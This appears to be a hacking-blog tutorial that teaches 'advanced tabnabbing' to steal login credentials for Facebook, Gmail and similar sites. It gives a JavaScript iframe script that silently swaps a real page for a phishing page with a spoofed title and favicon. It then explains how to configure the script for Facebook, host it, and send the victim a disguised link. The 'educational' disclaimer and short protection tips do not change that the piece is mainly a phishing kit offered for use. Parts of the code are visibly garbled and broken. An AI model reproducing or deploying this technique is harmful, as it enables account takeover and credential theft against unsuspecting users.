Hey friends, today i am going to How to Hack
emails, social networking websites and other websites involving login
information. The technique that i am going to teach you today is Advanced
Tabnabbing. I have already explained what is basic tabnabbing today we will
extend our knowledge base, i will explain things with practical example. So
lets learn..
Advanced Tabnabbing, Hack Facebook, Gmail, Yahoo
, Hotmail etc
Advanced Tabnabbing Tutorial
I will explain this tutorial using attack scenario and live example and
how to protect yourself from such stuff.
Let consider a attack scenario:
1. A hacker say(me Lokesh) customizes current
webpage by editing/adding some new parameters and variables.( check the code
below for details)
2. I (Lokesh) sends a copy of this web page to
victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage
similar to this one will open in iframe containing the real page with the help
of java script.
4. The user will be able to browse the website
like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for
certain period of time, the tab or website will change to Phish Page or simply
called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials
(username/password), he is entering that in Fake page and got trapped in our
net that i have laid down to hack him.
Here end’s the attack scenario for advanced
Note: This tutorial is only for Educational
Purposes, I did not take any responsibility of any misuse, you will be solely
responsible for any misuse that you do.
Hacking email accounts is criminal activity and is punishable under
cyber crime and you may get upto 10 years of imprisonment, if got caught in
doing so.
Before coding Part lets first share tips to
protect yourself from this kind of attack because its completely undetectable
and you will never be able to know that your account is got hacked or got
compromised. So first learn how to protect our-self from Advanced Tabnabbing.
Follow below measure to protect yourself from
1. Always use anti-java script plugin’s in your
web browser that stops execution of malicious javascripts. For example:
Noscript for Firefox etc.
2. If you notice any suspicious things happening,
then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat
message, never directly click on it. Always prefer to type it manually in
address bar to open it, this may cost you some manual work or time but it will
protect you from hidden malicious URL’s.
4. Best way is to use any good web security
toolbar like AVG web toolbar or Norton web security toolbar to protect yourself
from such attacks.
5. If you use ideveloper or Firebug, then verify
the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical
hacker duty to notify all users about the attack. Now lets start the real
Note: Aza Raskin was the first person to propose
the technique of tabnabbing and still we follow the same concept. I will just
extend his concept to next level.
First sample code for doing tabnabbing with the
help of iframes:
Title: Advanced Tabnabbing using IFRAMES and Java
Author: De$trUcTiVe M!ND
Website: http://www.hackingloops.com
<style type=”text/css”>
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding:
0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border:
none; overflow-y: auto; overflow-x: hidden;}
<script type=”text/javascript”>
//———-Set Script Options————–
var REAL_PAGE_URL = “http://www.google.com/”;
//This is the “Real” page that is shown when the user first views this page
var REAL_PAGE_TITLE = “Google”; //This sets the
title of the “Real Page”
var FAKE_PAGE_URL = “http://www.hackingloops.com”;
//Set this to the url of the fake page
var FAKE_PAGE_TITLE = “HackingLoops| Next
Generation Hackers Portal”; //This sets the title of the fake page
var REAL_FAVICON = “http://www.google.com/favicon.ico”;
//This sets the favicon. It will not
switch or clear the “Real” favicon in IE.
var FAKE_FAVICON = “http://www.hackingloops.com/favicon.ico”;
//Set’s the fake favicon.
var TIME_TO_SWITCH_IE = “4000”; //Time before
switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = “10000”; //Wait this
long before switching .
//—————End Options—————–
var TIMER = null;
var SWITCHED = “false”;
//Find Browser Type
var BROWSER_TYPE = “”;
if(/MSIE (d.d+);/.test(navigator.userAgent)){
BROWSER_TYPE = “Internet Explorer”;
var link =
= ‘image/x-icon';
link.rel =
‘shortcut icon';
//Create our iframe (tabnab)
var el_tabnab = document.createElement(“iframe”);
el_tabnab.setAttribute(‘src’, REAL_PAGE_URL);
//Focus on the iframe (just in case the user
doesn’t click on it)
//Wait to nab the tab!
if(BROWSER_TYPE==”Internet Explorer”){ //To
unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
el_tabnab.onfocus= function(){
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
function TabNabIt(){
if(SWITCHED == “false”){
the iframe to FAKE_PAGE_URL
title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title =
the favicon — This doesn’t seem to work in IE
if(BROWSER_TYPE != “Internet Explorer”){
var links
= document.getElementsByTagName(“head”)[0].getElementsByTagName(“link”);
for (var
i=0; i<links.length; i++) {
looplink = links[i];
(looplink.type==”image/x-icon” && looplink.rel==”shortcut icon”) {
var link =
= “image/x-icon”;
link.rel =
“shortcut icon”;
Now what you need to replace in this code to make
it working say for Facebook:
1. REAL_PAGE_URL : http://www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook – Log
In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page
4. FAKE_PAGE_TITLE : Welcome to Facebook – Log
In, Sign Up or Learn More
5. REAL_FAVICON : http://www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico
( Note: Its better to upload the facebook favicon, it will make it more
7. BROWSER_TYPE : Find which web browser normally
user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time)
after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you
want to switch back to original ‘real’ page or some other Page.
Now as i have explained earlier you can use this
technique to hack anything like email accounts, Facebook or any other social
networking website. What you need to do is that just edit the above mentioned 9
fields and save it as anyname.htm and upload it any free web hosting website
along with favicon file and send the link to user in form of email or chat
message ( hidden using href keyword in html or spoofed using some other
Sign up here with your email
ConversionConversion EmoticonEmoticon